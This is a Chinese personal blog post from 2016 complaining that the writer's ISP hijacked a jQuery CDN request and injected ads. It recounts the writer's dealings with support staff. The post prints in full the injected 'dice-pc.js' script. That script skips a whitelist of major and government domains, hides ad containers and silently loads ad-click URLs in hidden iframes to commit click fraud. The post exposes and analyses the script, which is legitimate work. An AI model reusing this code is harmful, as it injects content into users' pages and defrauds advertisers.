<!doctype html>



  


<html class="theme-next muse use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  




<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/logo.png?v=5.0.1" />






<meta name="description" content="呼呼～终于做完了。易迅这 Demo 7页搞完也真是不容易，每天都是 DIV-DIV 真是够了。HTML 结构和 CSS 反正是折腾完了，补了显眼部分的动效。后端部分偷懒没模拟,做的很粗糙，细节部分慢慢补吧。
 HTML-仿易迅商城整站">
<meta property="og:type" content="article">
<meta property="og:title" content="蛋疼的HTTP劫持">
<meta property="og:url" content="http://yoursite.com/2016/06/16/蛋疼的HTTP劫持/index.html">
<meta property="og:site_name" content="你好，旅行者">
<meta property="og:description" content="呼呼～终于做完了。易迅这 Demo 7页搞完也真是不容易，每天都是 DIV-DIV 真是够了。HTML 结构和 CSS 反正是折腾完了，补了显眼部分的动效。后端部分偷懒没模拟,做的很粗糙，细节部分慢慢补吧。
 HTML-仿易迅商城整站">
<meta property="og:image" content="http://yoursite.com/./jc1.jpg">
<meta property="og:image" content="http://yoursite.com/./jc2.jpg">
<meta property="og:updated_time" content="2016-07-08T14:37:02.822Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="蛋疼的HTTP劫持">
<meta name="twitter:description" content="呼呼～终于做完了。易迅这 Demo 7页搞完也真是不容易，每天都是 DIV-DIV 真是够了。HTML 结构和 CSS 反正是折腾完了，补了显眼部分的动效。后端部分偷懒没模拟,做的很粗糙，细节部分慢慢补吧。
 HTML-仿易迅商城整站">
<meta name="twitter:image" content="http://yoursite.com/./jc1.jpg">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"hide"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 蛋疼的HTTP劫持 | 你好，旅行者 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  


<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-77374526-1', 'auto');
  ga('send', 'pageview');
</script>


  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?b106d71b3fd9ebb859c788403497c8d1";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=56399385";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>






  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">你好，旅行者</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">愿大地母亲忽悠着你</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
      
        
        
        
            
             <li class="menu-item menu-item-home">
               <a href="/" rel="section">
                
                  <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
                   
                首页
              </a>
            </li>
            
        
        
        
      
      
        
        
        
        
      
      
        
        
        
            
             <li class="menu-item menu-item-archives">
               <a href="/archives" rel="section">
                
                  <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
                   
                归档
              </a>
            </li>
            
        
        
        
      
      
        
        
      
      
        
        
        
            
             <li class="menu-item menu-item-guestbook">
               <a href="/guestbook" rel="section">
                
                  <i class="menu-item-icon fa fa-comments fa-fw"></i> <br />
                   
                留言
              </a>
            </li>
            
        
        
        
      
      
        
        
        
            
             <li class="menu-item menu-item-demo">
               <a href="/demo" rel="section">
                
                  <i class="menu-item-icon fa fa-folder fa-fw"></i> <br />
                   
                Demo
              </a>
            </li>
            
        
        
        
      
      
        
        
        
            
             <li class="menu-item menu-item-about">
               <a href="/about" rel="section">
                
                  <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
                   
                关于
              </a>
            </li>
            
        
        
        
            

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                蛋疼的HTTP劫持
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-06-16T20:20:52+08:00" content="2016-06-16">
              2016-06-16
            </time>
          </span>

          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/06/16/蛋疼的HTTP劫持/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/06/16/蛋疼的HTTP劫持/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>呼呼～终于做完了。易迅这 Demo 7页搞完也真是不容易，每天都是 DIV-DIV 真是够了。HTML 结构和 CSS 反正是折腾完了，补了显眼部分的动效。后端部分偷懒没模拟,做的很粗糙，细节部分慢慢补吧。</p>
<p> <a href="/demo/demos/HTML-仿易迅商城整站/">HTML-仿易迅商城整站</a></p>
<a id="more"></a>
<p>做完感觉 CSS 还是太乱，除了显眼的头尾、及个别窗体，重用部分还是不够。主要是写结构的时候没全局的感觉，不能一眼看完效果图就知道哪哪哪可重用，然后为后面 Class 埋伏笔。我现在对 CSS 的感觉就像小学生写字，一笔一画往下写，虽然能写完但不漂亮，是不是该找个 CSS 框架。短期来看还是站巨人肩头长得高。    SCSS 好像不错。</p>
<p>还要喷下铁通，尼玛我本地写代码都有广告……我只引用了百度的 JQUERY 库而已。例如我写个空白 HTML ,仅引入百度 Jquery 。</p>
<figure class="highlight vbscript-html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Document<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>后然……</p>
<p><img src="./jc1.jpg" alt="Jquer劫持"></p>
<p><img src="./jc2.jpg" alt="Jquer劫持"></p>
<p>可以明显看到 Jquery 被HTTP劫持 302 跳转到移动服务器，然后一大波 JS ，DOM 中 IFRAME 引入了广告。</p>
<p>其中有个 JS 拆开很有意思：</p>
<blockquote>
<p><a href="http://g.gclick.cn/static/dice-pc.js" target="_blank" rel="external">http://g.gclick.cn/static/dice-pc.js</a></p>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">! <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, a = <span class="string">"dice-pc"</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">window</span>._GRD &amp;&amp; <span class="built_in">window</span>._GRD.triggerStats &amp;&amp; <span class="built_in">window</span>._GRD.triggerStats(a), !<span class="built_in">Math</span>.DICE) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">Math</span>.DICE = !<span class="number">0</span>, b = <span class="regexp">/baidu.com|taobao.com|qq.com|360.cn|sogou.com|www.apple.com|cntv.cn|1360.com|hao123.com|12306.cn|icbc.com.cn|duba.com|10086.cn|google.com.hk|google.com|bing.com|chinaz.com|duba.net|gdltax.gov.cn|alibaba.com|qihoo.com|xiaomi.com|google.cn|bjjtgl.gov.cn|moe.edu.cn|moe.gov.cn|www.mof.gov.cn|www.mohurd.gov.cn|cq.gov.cn|www.sipo.gov.cn|www.sda.gov.cn|jl.gov.cn|www.sdpc.gov.cn|www.saic.gov.cn|www.beijing.gov.cn|www.customs.gov.cn|hainan.gov.cn|jiangxi.gov.cn|www.fmprc.gov.cn|www.mohrss.gov.cn|www.aqsiq.gov.cn|bjjtgl.gov.cn|www.cbrc.gov.cn|mofcom.gov.cn|www.szaic.gov.cn|www.mod.gov.cn|www.sc.gov.cn|www.csrc.gov.cn|www.forestry.gov.cn|e21.cn|www.nmg.gov.cn|www.fujian.gov.cn|www.shanxigov.cn|www.shaanxi.gov.cn|ccn.mofcom.gov.cn|taiwan.net.tw|www.jiangsu.gov.cn|www.gd.gov.cn|www.gansu.gov.cn|www.hunan.gov.cn|www.qh.gov.cn|jxedu.gov.cn|www.hlj.gov.cn|www.hebei.gov.cn|www.gzgov.gov.cn|www.chengdu.gov.cn|bjrbj.gov.cn|www.nx.gov.cn|yw.gov.cn|haaic.gov.cn|gxeea.cn|sbj.saic.gov.cn|cnnic.cn|jxhld.gov.cn|court.gov.cn|www.chinagrain.gov.cn|cas.cn|changzhi.gov.cn|ly.gov.cn|huzhou.gov.cn|www.shandong.gov.cn|www.changsha.gov.cn|www.fuzhou.gov.cn|www.wenzhou.gov.cn|www.mlnews.gov.cn|www.xm.gov.cn|foshan.gov.cn|www.mas.gov.cn|ahxf.gov.cn|npc.gov.cn|hongze.gov.cn|linfen.gov.cn|www.changde.gov.cn|yn.gov.cn|qyxy.baic.gov.cn|xf.gov.cn|www.xiangxiang.gov.cn|hebwst.gov.cn|dg.gov.cn|www.zhenjiang.gov.cn|smesd.gov.cn|l.gov.cn|www.bjchy.gov.cn|maoming.gov.cn|linyi.gov.cn|moc.gov.cn|gwytb.gov.cn|www.huangshan.gov.cn|ccgp.gov.cn|mps.gov.cn|www.pingliang.gov.cn|henan.gov.cn|www.taizhou.gov.com/</span>, c = <span class="string">"01b1f6566fbc77663f16"</span>, d = <span class="string">"2d724824dd45d5c89b25"</span>, e = <span class="number">0</span>, f = <span class="function"><span class="keyword">function</span> (<span class="params">a</span>) </span>&#123;</span><br><span class="line">                <span class="built_in">window</span>.DICELOGS = <span class="built_in">window</span>.DICELOGS || [], <span class="built_in">window</span>.DICELOGS.push(a)</span><br><span class="line">            &#125;, location.hostname.match(b)) <span class="keyword">return</span> f(<span class="string">"* Good boy."</span>);</span><br><span class="line">        g = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">            e &gt; <span class="number">1</span> || (e++, <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">                <span class="keyword">var</span> a;</span><br><span class="line">                <span class="keyword">return</span> <span class="built_in">document</span>.body ? (a = <span class="built_in">document</span>.createElement(<span class="string">"script"</span>), a.type = <span class="string">"text/javascript"</span>, a.text = <span class="string">'_guanggao_pub= "'</span> + c + <span class="string">'";'</span>, a.text += <span class="string">'_guanggao_slot= "'</span> + d + <span class="string">'";'</span>, <span class="built_in">document</span>.body.insertBefore(a, <span class="built_in">document</span>.body.children.item(<span class="number">0</span>)), a = <span class="built_in">document</span>.createElement(<span class="string">"script"</span>), a.src = <span class="string">"http://ssp.thescenseproject.com/js/01b1f6566fbc77663f16"</span>, a.type = <span class="string">"text/javascript"</span>, <span class="built_in">document</span>.body.insertBefore(a, <span class="built_in">document</span>.body.children.item(<span class="number">0</span>)), <span class="keyword">void</span> <span class="number">0</span>) : setTimeout(<span class="built_in">arguments</span>.callee, <span class="number">50</span>)</span><br><span class="line">            &#125;())</span><br><span class="line">        &#125;, h = <span class="function"><span class="keyword">function</span> (<span class="params">a, b</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">Math</span>.random() * (<span class="built_in">Math</span>.max(a, b) - <span class="built_in">Math</span>.min(a, b)) + <span class="built_in">Math</span>.min(a, b)</span><br><span class="line">        &#125;, i = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> h(<span class="number">1</span>, <span class="number">50</span>)</span><br><span class="line">        &#125;, j = <span class="function"><span class="keyword">function</span> (<span class="params">a</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">var</span> b = <span class="number">0</span></span><br><span class="line">                , c = <span class="number">0</span></span><br><span class="line">                , d = <span class="number">.0125</span> * a + <span class="number">.375</span>;</span><br><span class="line">            <span class="keyword">return</span> a &gt; <span class="number">10</span> &amp;&amp; <span class="built_in">Math</span>.random() &lt; d ? (c = h(<span class="number">2</span>, <span class="number">10</span>), b = c * h(<span class="number">1</span>, <span class="number">5</span> / c)) : b = a, b</span><br><span class="line">        &#125;, k = <span class="regexp">/http:\/\/ssp\.thescenseproject\.com\/clk2\.html\?q\=[0-9a-zA-Z]+/g</span>, l = !<span class="number">1</span>, m = <span class="number">0</span>, n = <span class="function"><span class="keyword">function</span> (<span class="params">b</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">var</span> d, e, g, c = <span class="number">.02</span>;</span><br><span class="line">            <span class="keyword">return</span> f(<span class="string">"* Click rate: &lt;"</span> + c + <span class="string">"&gt;."</span>), <span class="built_in">Math</span>.random() &gt; c ? f(<span class="string">"* Click ignore."</span>) : (d = <span class="built_in">document</span>.createElement(<span class="string">"iframe"</span>), e = <span class="number">1e3</span> * j(i()), g = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">                <span class="built_in">document</span>.body.appendChild(d), <span class="built_in">window</span>._GRD &amp;&amp; <span class="built_in">window</span>._GRD.triggerEventStats &amp;&amp; <span class="built_in">window</span>._GRD.triggerEventStats(a, <span class="string">"click"</span>)</span><br><span class="line">            &#125;, d.style.display = <span class="string">"none"</span>, d.setAttribute(<span class="string">"src"</span>, b), setTimeout(g, e), f(<span class="string">"* Clicked."</span>), <span class="keyword">void</span> <span class="number">0</span>)</span><br><span class="line">        &#125;, <span class="built_in">document</span>.body._insertBefore = <span class="built_in">document</span>.body.insertBefore, <span class="built_in">document</span>.body.insertBefore = <span class="function"><span class="keyword">function</span> (<span class="params">a, b</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"DIV"</span> === a.tagName &amp;&amp; <span class="number">0</span> === a.id.indexOf(c + <span class="string">"_"</span> + d) &amp;&amp; (a.style.height = <span class="string">"0px"</span>, a.style.visibility = <span class="string">"hidden"</span>), <span class="built_in">document</span>.body._insertBefore(a, b)</span><br><span class="line">        &#125;, o = <span class="number">0</span>, p = setInterval(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">var</span> b, c, e, h, i, j;</span><br><span class="line">            <span class="keyword">if</span> (!h) &#123;</span><br><span class="line">                <span class="keyword">if</span> (o &gt;= <span class="number">5</span>) <span class="keyword">return</span> o = <span class="number">0</span>, <span class="keyword">void</span> <span class="number">0</span>;</span><br><span class="line">                <span class="keyword">for</span> (<span class="number">0</span> === o &amp;&amp; (f(<span class="string">"* Call origin script."</span>), g()), o++, b = <span class="built_in">document</span>.getElementsByTagName(<span class="string">"iframe"</span>), i = b.length; i--;)</span><br><span class="line">                    <span class="keyword">if</span> (e = b[i].attributes, iframeParent = b[i].parentNode, iframeParent &amp;&amp; iframeParent.id &amp;&amp; iframeParent.id.indexOf(d) &gt; <span class="number">0</span>)</span><br><span class="line">                        <span class="keyword">for</span> (j = e.length; j--;) <span class="string">"data-srcdoc"</span> === e[j].nodeName &amp;&amp; (f(<span class="string">"* Dice click url found."</span>), c = b[i], h = (e[j].value || e[j].nodeValue || e[j].textContent).toString());</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    l = h ? h.match(k) : [], m = l.length</span><br><span class="line">                &#125; <span class="keyword">catch</span> (q) &#123;&#125;</span><br><span class="line">                m &amp;&amp; (clearInterval(p), l = l[<span class="built_in">parseInt</span>(<span class="built_in">Math</span>.random() * m)], n(l), c.parentNode.style.display = <span class="string">"none"</span>, <span class="built_in">window</span>._GRD &amp;&amp; <span class="built_in">window</span>._GRD.triggerEventStats &amp;&amp; <span class="built_in">window</span>._GRD.triggerEventStats(a, <span class="string">"view"</span>))</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;, <span class="number">500</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;();</span><br></pre></td></tr></table></figure>
<p>第三行可以很明显看到有113条白名单，刨去85个 GOV 域名的 government 。</p>
<blockquote>
<p>/baidu.com | taobao.com | qq.com | 360.cn | sogou.com | www.apple.com | cntv.cn | 1360.com | hao123.com | 12306.cn | icbc.com.cn | duba.com | 10086.cn | google.com.hk | google.com | bing.com | chinaz.com | duba.net | alibaba.com | qihoo.com | xiaomi.com | google.cn | moe.edu.cn | </p>
</blockquote>
<p>再联合到之前的新闻，果然会哭的孩子有奶吃。</p>
<blockquote>
<p><a href="http://www.huxiu.com/article/135293/1.html" target="_blank" rel="external">腾讯、小米、360 等 “六国联军” 结盟抵制 “流量劫持”</a></p>
</blockquote>
<p>其实当年的铁通还可以，直到去年中期，不知道是不是和移动合并的缘故，开始封UDP、PPTP端口、插广告，微信随便打开链接直接跳转到 “添加营销号” 页。这样劫持你敢信……而且网络也各种NAT，虽然给的是公网 IP，但是本地的电信都不能互访。还要绕海外的 VPS 来访问自家的路由也是醉了。</p>
<p>打电话举报，尼玛10050的铁通电话被告知与移动合并，又转去10086.（其实我很好奇联通打10086要扣费不?）果然跟客服妹纸扯不清，只让她记录上报。第二天一早还没起床，铁通运维的就来了，满口自信说铁通不可能劫持，一定是我电脑的问题。来了俩，当场演示，虽然他们不懂，但是我把白名单列出，里面有 10086.cn 这总看得懂吧。又一通电话召唤了个”懂技术”的，依然是坑，满口不在乎，看完演示直接走了，边走边说没劫持是不可能的……让拍了照继续上报。</p>
<p>我也知道这劫持肯定不是本地ISP就能解决的，一是没这么大权限，二是运维的一般也不懂。果然下午铁通机房的打电话来了，当然也是运维的，我说的 HTTP 劫持也不甚了解。只说明了不是他们本地劫持的，只能帮我往上报，至于能不能解决他们也没有办法，希望我能理解。然后让我提交一些图片证明。我本是加他 QQ 然后远程桌面演示的，结果巧的是劫持这时候没有了……我踩那位 “劫持者” 也是高层了，应该有监控后台工单，看到有投诉就默默取消了，反而下面不知道。不过仅仅是百度的劫持没有了，京东百度等返利的还在。但是那些证据就不好抓了，至少没有广告这个这么明显。只得作罢。走后过了会儿，运维的打电话来表示希望我能先结束工单，超期了他要扣钱，不过这个会继续往上面报。想想就同意了，毕竟也不是他们的锅。再后来就是移动以及本地的客服回访了，监督倒是不少，可不能解决问题有什么用呢……</p>
<p>这 3～4 天来看，百度 CDN 库的劫持倒是没有了，其他还在，想想还是算了，大不了明年换电信了，要不是看在这外网质量高早就不忍了，现在和我 VPS 不管早晚高峰稳定50ms。速度能跑满我多拨的 100M ～相反电信却一直找不到合适的线路，HK + CN2 + 大水管 符合的几乎都是天价，流量都是1R/G。这哪买得起……而且电信晚上那出口带宽，真是堪忧。</p>
<p>唉，蛋疼的网络……</p>

      
    </div>
    
    <div>
      
        
      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/06/15/锤子官网banner特效/" rel="next" title="锤子官网banner特效">
                <i class="fa fa-chevron-left"></i> 锤子官网banner特效
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/06/17/最近/" rel="prev" title="最近">
                最近 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/06/16/蛋疼的HTTP劫持/"
           data-title="蛋疼的HTTP劫持" data-url="http://yoursite.com/2016/06/16/蛋疼的HTTP劫持/" data-author-key="1">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/img/avatar.gif"
               alt="lqzh" />
          <p class="site-author-name" itemprop="name">lqzh</p>
          <p class="site-description motion-element" itemprop="description">咿呀咿呀哟的博客</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">18</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories"> 
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
               </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">            
            <a href="/tags"> 
                <a href="/tags">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a> 
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/lqzhgood" target="_blank" title="GitHub">
                  
                    <i class="fa fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:liuqinzhi@live.cn" target="_blank" title="Mail">
                  
                    <i class="fa fa-envelope"></i>
                  
                  Mail
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <p class="post-toc-empty">此文章未包含目录</p>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lqzh</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"lqzh"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
  





  
  
  

  

  

</body>
</html>
